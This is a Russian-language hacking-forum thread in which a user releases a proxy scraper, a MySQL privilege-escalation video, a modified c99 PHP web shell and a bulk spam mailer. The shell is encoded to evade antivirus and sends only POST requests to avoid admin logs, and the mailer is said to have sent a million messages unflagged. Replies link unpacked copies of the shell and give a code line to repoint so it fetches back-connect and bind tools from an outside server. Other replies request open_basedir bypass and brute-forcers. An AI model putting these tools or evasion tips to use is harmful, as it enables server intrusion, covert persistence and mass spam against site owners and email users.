Релизы от madnet

Обсуждение в разделе «Избранное», начал(-а) madnet, 9.04.2006.

  1. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423
    Итак, прошу прощение за то, что в последнее время, вроде как, ничего нового от меня не поступало.
    Наверстываю упущенное:


    1) Список проксей
    Наконец-то доработал скрипт сбора проксей.
    Каждый час берет публичные прокси из 3х источников, проверяет валидность, скорость соединение, страну и т.д. Старые удаляет, а свежие сохраняет в БД, так что кому на быструю руку нужны соксы, милости прошу
    http://madnet.name/tools/proxy/

    2) VIDEO
    Повышение прав, используя MySQL
    Скорее я его писал для тренировки в обработке видео, но тем не менее.
    Никак не могу выловить Zadoxik'а, поэтому надеюсь, он закинет видео отсюда
    Качаем, смотри, наслаждаемся
    http://madnet.name/files/3/14.html 1.7mb
    Старенькое видео об xss в set-cms
    http://madnet.name/files/3/13.html 2mb

    3) с99madshell
    Наверное, самый приятный релиз.
    Какой шелл вы юзаете?
    r57shell? потому что он гоняет все в посте?
    Так ведь он очень неудобен, да и в последних версиях он все больше использует гет+баннеры+графика, в общем, ужас.
    Из всего многообразия я для себя подобрал c99shell.
    Что бы кто ни говорил он самый удобный, но есть много недочетов.

    a) Картинки, запустите скрипт с включенной графикой в браузере, и вы подарили админу в лог минимум 100 строчек запросов.
    b) Антивирусы, шеллы не должны палиться антивирусниками
    c) Размер, 162кб для шелла, это согласитесь перебор.
    d) GET, просто самый огромный недостаток, все данные посылаются method=GET

    Итак, после некоторых мучений представляю полностью переделанный шелл.
    a) Никакой лишней графики
    b) Скрипт полностью переписан+тело закодировано, так что забудем про антивирусы
    c) Удалено все лишнее+сжат, размер теперь 44кб сделал все что смог
    в) Никакого GET, абсолютно все запросы гоняются методом POST, что позволит сделать наш шелл в системе слабо заметным.
    Качаем отсюда
    http://madnet.name/files/1/10.html

    4) TextForVideo
    Небольшая програмка для записи видео. Суть ее в следующем вы пишете в ней свой коментарий, а потом по нажатию горячей клавиши она вписывает коментарий в блокнот. Для того что-бы соответствовать событиям я сделал построчное разбиение, т.е, на каждой новой строке проги вы записываете фразу, которая должна быть выведена за раз.
    К примеру:
    Привет меня завут madnet сегодня я... ищем жертву.
    Будем работать с www.xxx.xxx

    Далее мы нажимаем на кнопку Запустить редактор
    Будет загружен Блокнот с вашим именем в качестве заголовка, которое вы выберете в поле Заголовок редактора
    Потом сворачиваем программу, она исчезает в трей.
    Теперь можно начинать запись.
    Все что остается сделать это нажимать на HotKey, которую вы установите в настройке, по умолчанию F9

    Нажимаем ее в блокноте печатается надпись
    Привет меня завут madnet сегодня я... ищем жертву.
    Теперь вы делаете че там вам надо ищете и т.д., нашли жмем снова HOTKEY блокнот автоматов выносится на первый план и в нем появляется
    Будем работать с www.xxx.xxx
    Ну и так далее по тексту.
    http://madnet.name/files/2/12.html

    5) Mailer
    Не подумайте что я спамер, просто был заказ написать спам скрипт.

    Вот мой spam скрипт,
    написан на php,
    работает через sendmail

    Возможности:
    Интеллектуальная рандомная генерация полей
    Рассылка с аттачем
    plane и html тип
    работа как с формами так и с файлами
    и т.д.

    Чел тестил на tut.by и yahoo.com
    разослал по 1 000 000 писем.
    Письма не были определены как спам.
    http://madnet.name/files/1/3.html

    Обо всех недочетах или пожеланиях пишем здесь, в ПМ или ICQ.

    Надеюсь, хоть что-то полезное вы здесь нашли для себя.

    С уважением madnet.
     
    #1 madnet, 9.04.2006
    В последний раз редактировалось: 19.09.2007
    Это одобряют 12 пользоветелей.
  2. Algol

    Algol New Member

    Регистрация:
    29.05.2002
    Сообщения:
    1 761
    Одобрения:
    3
    Репутация:
    0
    Мне понравился здесь список типов атак http://securityprobe.net/docs/2.html
    Может выложить его на античате? Автор кто? Согласен?
     
  3. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423
    Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net
     
  4. Algol

    Algol New Member

    Регистрация:
    29.05.2002
    Сообщения:
    1 761
    Одобрения:
    3
    Репутация:
    0
    Ок, только кое-что придется подредактировать, ибо я не со всем согласен в этой статье :)
     
  5. Zitt

    Zitt Elder - Старейшина

    Регистрация:
    7.05.2006
    Сообщения:
    791
    Одобрения:
    270
    Репутация:
    59
    madnet выложи гденить шелл в txt чтоб удобно юзать было. Типа как rst (http://rst.void.ru/download/r57shell.txt)
     
    Это одобряет 1 пользователь.
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Регистрация:
    13.04.2006
    Сообщения:
    1 138
    Одобрения:
    436
    Репутация:
    90
    :) вот я за него сделал http://sec-hack.org/soft/madshell.txt
     
    Это одобряют 2 пользоветелей.
  7. Elekt

    Elekt Banned

    Регистрация:
    5.12.2005
    Сообщения:
    946
    Одобрения:
    427
    Репутация:
    508
    Специально для поклонников шелла Маднета!

    С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде.

    http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php
    http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php
    http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip


    Теперь желающие смогут поправить его на свой вкус.
    Например, изменить константу
    Code:
    $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
    на свой сайт и грузить тулзы бэк-бинд-пайпа, которые не работают в оригинальном шелле.

    Также, Вы можете изменить алгоритм шифрования, или изменить стандартные 11 сжатий на , скажем, 150 :)

    Ах, вам не нравится шел Маднета? Вы уважаете шелл РСТ ?
    Ну, чтож. Там принцип сжатия аналогичен, теперь вы сможете сконструировать свой рст-шел под себя, а затем распаковать и вырезать гадские счётчики! :)
     

    Attached Files:

    Это одобряет 1 пользователь.
  8. karabym

    karabym Elder - Старейшина

    Регистрация:
    14.12.2006
    Сообщения:
    196
    Одобрения:
    30
    Репутация:
    1
    madnet

    Твой шелл рулез однозначно!!!

    Может с нуля забабацаешь шелл так сказать свой запатентованый :)
     
  9. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423
    нет в этом смысла, но возможно, если мне хватит сил и времени, вскоре появится что-то новенькое и интересное в этом направлении!
     
    Это одобряют 2 пользоветелей.
  10. karabym

    karabym Elder - Старейшина

    Регистрация:
    14.12.2006
    Сообщения:
    196
    Одобрения:
    30
    Репутация:
    1
    ОК юэсей :) будем ждать а ждать мы умеем :)
     
    Это одобряет 1 пользователь.
  11. SQLHACK

    SQLHACK Остались только слоны

    Регистрация:
    27.09.2006
    Сообщения:
    437
    Одобрения:
    372
    Репутация:
    407
    Вот пользовал я год с99. и понял имхо что бэк коннект и бинд должны быть всегда внутри шелла. это очень часто спасает, а увеличивает скрипт на 3кб.
    и ещё очень бы хотелось запихать туда возможность обхода open_basedir.

    и вообще я лично не понимаю нах бекконнект убирать из скрипта?
    чтоб юзер потом сам скачал, раскодировал, доделывал, кодировал,?

    это бл.. игра какая то новая такая ?
    под названием "после сборки обточить напильником"

    чесслово .Маразм
     
    _________________________
    #11 SQLHACK, 3.04.2007
    В последний раз редактировалось: 3.04.2007
    Это одобряет 1 пользователь.
  12. GlobaL

    GlobaL Banned

    Регистрация:
    21.02.2007
    Сообщения:
    111
    Одобрения:
    65
    Репутация:
    -18
    Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
    Code:
    Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
    Но прога роботает, пишет чьл разослано.
     
  13. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423

    Для того, что бы скрипт работал столько, сколько нужно, надо что бы на сервере был выключен Safe mode
     
  14. .Slip

    .Slip Banned

    Регистрация:
    16.01.2006
    Сообщения:
    1 593
    Одобрения:
    966
    Репутация:
    783
    У тебя тут очепятка:
    http://madnet.name/tools/madss/

    :)
     
    Это одобряет 1 пользователь.
  15. Knight_of_Darkness

    Knight_of_Darkness Elder - Старейшина

    Регистрация:
    3.02.2007
    Сообщения:
    71
    Одобрения:
    68
    Репутация:
    24
    а зеркала есть? +есть несколько идей насчет доработки шелла, отпишу попозже
     
  16. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423
    Зеркал нет и пока не вижу никакой необходимости в них.
     
  17. maximum

    maximum Elder - Старейшина

    Регистрация:
    2.04.2007
    Сообщения:
    72
    Одобрения:
    19
    Репутация:
    5
    Не качаеться!
    Что то с сайтом, или это только у меня так?
     
  18. madnet

    madnet Умиротворенный

    Регистрация:
    9.12.2004
    Сообщения:
    904
    Одобрения:
    343
    Репутация:
    423
    Доступ восстановлен.
     
    Это одобряет 1 пользователь.
  19. Scipio

    Scipio Members of Antichat

    Регистрация:
    2.11.2006
    Сообщения:
    726
    Одобрения:
    537
    Репутация:
    190
    мде... сейчас вот нужно было файлик один посмотреть, шелл залил, а посмотреть не смог, т.к. имя файла плюсенг содержит... это наверно с тех пор осталось, когда с99 с Гет запросами работал (ну всмысле менял плюсенг на %2b)... надо бы исправить

    да и так недочеты есть, например файло сохраняет в туже папку где и шелл, а это имхо бывает критично, например залил я шелл через админку ну или еще как нить шелл залился а когда я его открываю, прав на запись (из шелла) в эту папку нет, а там еще и сейфмоде докучи... вобщем вот... а еще Sql клиент содержит недочеты

    А в целом хорошо, сделано все через пост, картинок нет, которые нах ненужны были

    вобщем если все доработать (ну там баги некторые устранить, тулзы типа бэкконект в шелл встроить, брутер опять же с обратными логинами сделать, можно еще и мускул брут сделать) хотя понимаю, что объять необъятное нельзя и всем неугодишь, буду только им пользоваться
     
    _________________________
    #19 Scipio, 3.11.2007
    В последний раз редактировалось: 3.11.2007
  20. 1SeTh

    1SeTh Elder - Старейшина

    Регистрация:
    17.02.2006
    Сообщения:
    165
    Одобрения:
    18
    Репутация:
    5
    Madnet

    Спасибо за спам скрипт.
    Действительно письма не определяются как спам. Но вот беда тип html не работает. До адресата доходить теги в открытом виде.
     
Загрузка...
Similar Threads - Релизы madnet
  1. _Great_
    Ответы:
    13
    Просмотры:
    18 397
  2. madnet
    Ответы:
    73
    Просмотры:
    77 378
  3. Gh0s7
    Ответы:
    13
    Просмотры:
    15 006
  4. Trinux
    Ответы:
    59
    Просмотры:
    53 775